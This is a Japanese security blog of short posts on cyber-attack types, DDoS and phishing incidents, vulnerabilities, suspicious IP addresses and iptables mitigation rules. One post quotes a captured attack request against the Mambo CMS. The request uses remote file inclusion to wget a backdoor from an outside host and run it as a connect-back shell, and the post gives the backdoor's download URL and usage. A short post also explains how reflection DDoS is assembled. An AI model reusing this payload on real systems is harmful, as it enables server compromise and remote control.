サイバー攻撃の種類

サイバー攻撃の種類

以前書いた記事ではサイバー攻撃は、3種類のことを書きました。

改めて検討したみましたが、サイバー犯罪をも含みますが、もっと広く犯罪を構成せずとも含む概念です。

その種類は以下の4種類になると考えています。



・サイバークライム
金銭等を目的にした攻撃

・サイバーインテリジェンス
諜報活動、スパイ活動を目的にした攻撃

・サイバーテロ
重要インフラや政府に対する思想を持った攻撃

・サイバーストーカー
嫌がらせ目的で行われる攻撃
恋愛感情がなくても別のことを目的にした攻撃

怪しいアクセスをしてきたIPアドレス

怪しいアクセスをしてきたIPアドレス。

あとからのチェック用。

50.22.163.2
211.147.231.2
65.255.42.40
123.15.44.125
213.25.175.194
77.222.43.19
202.75.211.206
111.228.1.5
221.130.177.169
67.15.88.38
58.128.189.249
63.131.140.20
120.70.227.130
219.94.154.72
222.231.60.164
222.222.194.187
61.19.213.42
74.52.185.98
76.74.252.134
88.190.15.188
123.30.109.21
201.144.52.130
209.123.163.24
213.186.48.20
220.194.56.86
109.237.214.77

twitter

twitterが２２時２０分頃からダウンしてる。

googleのリアルタイム検索だと流れてくるから、投稿も問題ないようだが、本家サイトが長時間ダウンも珍しい。

中国の書き込みが増えたことも原因かというのもあったが、それぐらいではダウンしないと思う。

明日は中国で大規模集会らしい。

リンク攻撃？

あるWebサイトAが、別のサイトBの複数の画像を<imgタグで取って来るように記述されていた場合、サイトAにアクセスしたユーザーは、サイトBに複数回アクセスしたことになる。

サイトBには、
a.gif、b.gif、c.gif、d.gifの画像があるとすると、

サイトA
<img src="http://siteb.com/a.gif">
<img src="http://siteb.com/b.gif">
<img src="http://siteb.com/c.gif">
<img src="http://siteb.com/d.gif">

として、画像を取得している。


この時、サイトBがコネクションフラッドの攻撃を受けていたとする。

サイトAへアクセスしたユーザーはサイトBからの画像が取れないため、サイトAの画像が表示されない状態になるので、何度もリロードをするとサイトBに攻撃しているようにサイトBのログには残ってしまう。

この場合、サイトAもサイトBも共にDoS攻撃を受けているように見えることになる。

アクセスの多いサイトAが別のサイトBの画像等を取得するように記述されていると、画像があるサイトBは、サイトAへアクセスしているユーザ達からDDoS攻撃を受けているように見えてしまう。

サイトAがアクセス数の多いサイトであるため、サーバの増強により耐性があればあるほど、サイトBへの攻撃数が多くなることになってしまう。


意図しない攻撃に加担してしまうおそれの攻撃です。


これは何という攻撃名になってしまうのだろうか？？

警察庁と防衛省にサイバー攻撃の可能性

昨日の警察庁、防衛省の閲覧困難は、やはりサイバー攻撃が原因でした。

http://mainichi.jp/select/wadai/news/20100918k0000m040044000c.html

http://www.jiji.com/jc/c?g=soc_30&k=2010091700778

http://www.yomiuri.co.jp/national/news/20100917-OYT1T00692.htm

http://www.47news.jp/CN/201009/CN2010091701000715.html

サイバー攻撃予告の件はNHKでもニュースになっています

サイバー攻撃予告の件はNHKでもニュースになっていました。

「中国のインターネットのサイトには、日本に対するサイバー攻撃やデモを呼びかける書き込みが相次いでいます。」

画像も、予告があったサイトの画像が貼られています。

予告日は18日土曜日の20時(中国時間)で、日本との時差は-1時間なので、21時ごろの予告だそうです。

SSHブルートフォース 複数のIPアドレスから

複数のIPアドレスからSSHブルートフォース攻撃をするのが流行っているそうです。

同一IPアドレスから複数のユーザとパスワードを試行する攻撃は以前からありましたが、ボットネットを利用して複数のIPアドレスから攻撃を仕掛けるようです。

IPアドレス制限、パスワードではなく公開鍵方式にすればいいです。

http://www.itmedia.co.jp/enterprise/articles/1006/21/news026.html

大規模DDoS攻撃

昨日から大規模DDoS攻撃が行われている模様です。

http://www.maido3.cc/server/
http://www.j-cast.com/2010/03/01061197.html?ly=cm&p=1

DDoS攻撃

レンタルサーバのGMO社のアイルがDDoS攻撃を受けている模様です。

http://home.isle.ne.jp/support/technews/index.php

経過報告が出ています。
http://home.isle.ne.jp/news/2010/ac6j5o0000005j11.html

e-bankのフィッシングサイト

e-Bankを騙ったフィッシングサイトが登場しています。

http://www.ebank.co.jp/kojin/news/important/information_175.html

みなさま、ご注意を。

FirefoxのIDP

http://firekeeper.mozdev.org/

Snortを参考にしたIDPのようです。HTTPSもパターンマッチングして検知できるのが今までとは違いますね。

Snortの脆弱性

SnortのDCE/RPC Preprocessorでリモートから攻撃可能な脆弱性が発見されています。

http://www.snort.org/docs/advisory-2007-02-19.html

TBC事件の判決が出てたんですね

http://j-cast.com/2007/02/10005462

原告13名が3万5000円、1名が2万2000円の賠償金

安いですね～。
企業も深刻に受け止めないでしょうし。
もっとも、信頼・信用低下は免れませんが。

集団訴訟が認められないと今後もこのような結論になりそうですが、法制度が難しそうです。

裁判所は、個人情報に対しては重要視していないということなのでしょうか。

地裁レベルですので、なんとも言えませんが、控訴はない可能性が高いですし、これで終わっちゃうのでしょうか。

警察庁のサイトにDoS攻撃

警察庁のサイトがDoS攻撃されたようです。

http://headlines.yahoo.co.jp/hl?a=20060828-00000073-jij-soci

どのくらいの攻撃だったんでしょうかね。

徳島大Webサーバがフィッシングサイトに

http://www.itmedia.co.jp/enterprise/articles/0604/13/news066.html

徳島大Webサーバがフィッシングサイトにされていたようです。
解析結果を詳しく知りたいですけど、無理ですね。どういう風に侵入されたのか。IDとパスワードがtest、testじゃないですよね。

こういうのって不正アクセス事案として警察に届けているんですかね？IPAに届けて終わりとか？直しましたで終わり？
どうなんでしょう。

IIJ

IIJがIngress Filterである「Source Address Validation」を導入するようです。
http://www.iij.ad.jp/pressrelease/2006/0308.html

Ingress Filterは、IPAから出てる資料がありました。
http://www.ipa.go.jp/security/rfc/RFC2827JA.html

Linuxを狙う新たなワーム

Linuxを狙う新たなワームが出現，“ボット”の機能を持つ
http://itpro.nikkeibp.co.jp/article/NEWS/20060221/230155/

MamboやXML-RPC for PHPのセキュリティ・ホールを攻撃してくるようです。
Linuxがワームの標的にされるとハニーポットの解析が面倒になりますが、これらのサービス及びPHPを使用していなければ関係ありませんな。

聞くところによるとWindowsのハニーポットはワームが大半で脆弱な状態にしておけないそうです。

EnCaseの販売会社が不正アクセス

フォレンジックツールで著名なEnCaseの販売会社Guidance Softwareに不正アクセスがあった模様です。

http://japan.internet.com/busnews/20051222/12.html
http://www.internetnews.com/security/article.php/3572386

VMWareの脆弱性

http://secunia.com/advisories/18162/
http://www.itmedia.co.jp/enterprise/articles/0512/22/news046.html

VMwareの脆弱性が出てます。ヒープのBOFです。
NATにしている人のみ影響を受けます。ちなみにデフォルトはブリッジです。

FTPのeprtとportのリクエスト時にヒープのBOFが発生して、ホストOSが乗っ取られるようです。つまり、侵入者がNATで構築したVMWareに入った後、FTPを外側に投げようとするときに、ホストOSを乗っ取られるようです。

ファイアウォールへのログ集計

ファイアウォールへのアクセス集計

135番ポート　2093
137番ポート　0
138番ポート　0
139番ポート　225
445番ポート　1653
1025番ポート　32
1433番ポート　86
4899番ポート　67

Mambo？の脆弱性への攻撃

Mamboってのに対するPHPの脆弱性を付いた攻撃が来ていました。

/index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208080;echo%20YYY;echo|

バックドアっぽいcbackというツールはダウンロード可能でした。Linuxの実行ファイルです。
http://216.103.82.214/cback
使い方は、
./cback <接続許可ホスト> <待ちうけポート> でしょうね。 http://news.mamboserver.com/index.php?option=com_content&task=view&id=2144&Itemid=2

Excelの脆弱性をオークション(eBay)で販売したが、削除

http://japan.cnet.com/news/sec/story/0,2000050480,20092656,00.htm

Excelの脆弱性をオークションで出品していたけど、eBayが削除したようです。
出品記載を工夫すれば、eBayに見付からなかった可能性もありますね。

確かに脆弱性を発見しても無料奉仕みたいなものですから、発見者も何とか金儲けをしたいんでしょうか。

これがエスカレートすると、ウィルス作成したからソースをオークションで売りますという輩も出てくるんでしょうか。直接的な表題だとばれるから、違う名称にするとは思いますけど。

DS

私はゲームには全く興味がないのですが、任天堂DS、結構売れているようです。

で、その任天堂DSには、無線LANになる機能を持っていて、ゲームの中でチャットができるそうです。PS2のようなものでしょうか。そして、任天堂DSは結構小中学生の子供たちも持っているそうです。
とすれば、設定は簡単にしておかなくては利用してくれないので、多分簡単設定になっているのでしょう。

犬と遊ぶのや動物の森というゲームは、街を歩くとデータ交換をするそうです。

懸念される内容は、それほど、たいしたことはありませんが、
・小中学生、高校生が利用→任天堂DSでどこでもチャット可能→携帯と同じで出会い系、売春系 ・任天堂DSの乗っ取り（任天堂DSにどんな内容が入っているか知りませんが…） ・任天堂DSを経由した無線LANの乗っ取り(踏み台は個人的にはどうでも良いですが、ローカル内PCの侵入は心配)
こんなもんでしょうか。携帯を持たせるのと同様に親御さんは注意が必要ですね。

不正アクセス禁止法の見解を高木氏が発表

http://internet.watch.impress.co.jp/cda/event/2005/12/01/10051.html

リダイレクションの解説

メモ
************
リダイレクション関係をまとめたページです。
http://cai.cs.shinshu-u.ac.jp/sugsi/Lecture/HowToUnix/2-1.html

DRDOSへのメモ

DRDOSに対するメモ

Webサーバにiptablesで1分間に10パケット=6秒間に1パケットのペースでSYN/ACKパケットをチェック。
SYN/ACKパケットが5個連続で来たらチェックする。

iptables -A INPUT -p tcp --source-port 80 --tcp-flags ALL SYN,ACK -m limit --limit 10/m --limit-burst 5 -j ACCEPT
続いて、ログを取る。
iptables -A INPUT -p tcp --source-port 80 --tcp-flags ALL SYN,ACK -j LOG --log-level 7 --log-prefix "IPT:"
続いて、破棄する。
iptables -A INPUT -p tcp --source-port 80 --tcp-flags ALL SYN,ACK -j DROP

/etc/syslog.confに以下を追加。
kern.debug　　　/var/log/jem.log

これで、iptablesで引っ掛かったパケットのログを取得。
でも生ログじゃない。

これは、SYN/ACKだけしか見てないけど、通常の通信でサーバが
SYN/ACKを受け取ることはあるのかな？

このWebサーバがクライアントとしてSYN/ACKを受け取るなら遮断してしまうので、
要検討です。

反射攻撃

反射攻撃(DRDOS)について

DRDOSは、あるサーバの開いているポートに対してパケットを投げ、送信元IPを
攻撃したいIPに設定して送出。受け取ったサーバは、攻撃したIPアドレスに対して、
Syn/Ackを返答する。

これを複数の踏み台用のサーバを見つけて、同時に送出すれば、DRDoSの完成。

でも攻撃されるサーバ側で、いきなりSyn/Ackが来たらDropする
ってのはできないんでしたっけ？(調査しようっと)
それができれば、何の問題もないような気がするんですが、いかがでしょうか？

SSL Bomb

SSL Bombのシグネチャがここにあります。

ACCAの個人情報漏えい

ACCAの個人情報漏洩

最近個人情報が漏れるのが多いです。

というか、多分以前から漏れていたが、最近マスコミがこぞって
報道しているからそのように見えるのかも!?

氏名、住所、電話あたりなら、漏れても当たり前になっていると思われます。
ポイント制のカード、懸賞応募、サイトの入会登録などなど。

商法が改正されて、株主総会の議決権などが電子化されていると聞いたことが
ありますが、このような名簿は危険だと思います。

それと電子政府。

ますます個人情報が漏れやすい時代の到来です。

データベースの暗号化、同時に閲覧できる情報を制限する、可視できる情報を少なくする、
情報を分散させる(氏名と住所と電話番号は別々のサーバ)などしか浮かばないです。

やはりデータは物じゃないので、目に見えず管理しにくいのが現状でしょうか。